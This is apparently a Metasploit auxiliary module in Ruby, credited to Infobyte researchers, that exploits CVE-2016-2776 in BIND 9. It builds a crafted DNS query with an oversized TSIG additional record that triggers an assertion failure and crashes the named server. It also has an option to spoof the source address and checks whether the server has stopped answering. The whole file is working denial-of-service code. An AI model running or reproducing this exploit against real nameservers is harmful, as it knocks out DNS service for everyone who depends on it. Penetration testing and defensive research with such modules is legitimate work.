## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', 'Description' => %q{ Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end def check_server_status(ip, rport) res = "" sudp = UDPSocket.new sudp.send(valid_query, 0, ip, rport) begin Timeout.timeout(5) do res = sudp.recv(100) end rescue Timeout::Error end if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) check_server_status(ip, rport) end def get_domain domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) org = "\x03"+Rex::Text.rand_text_alphanumeric(3) get_domain = domain+org end def payload query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 query += "\x00\x00" # Authority RRs: 0 query += "\x00\x01" # Additional RRs: 1 # Doman Name query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) query += "\x00\x00\x00\x00" # Time to live: 0 query += "\x00\xfc" # Data length: 252 # Algorithm Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes query += "\x00" # Rest of TSIG query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART query += "\x01\x2c" # Fudge: 300 query += "\x00\x10" # MAC Size: 16 query += Rex::Text.rand_text_alphanumeric(16) # MAC query += "\x8f\x65" # Original Id: 36709 query += "\x00\x00" # Error: No error (0) query += "\x00\x00" # Other len: 0 end def valid_query query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 query += "\x00\x00" # Authority RRs: 0 query += "\x00\x00" # Additional RRs: 0 # Doman Name query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s end end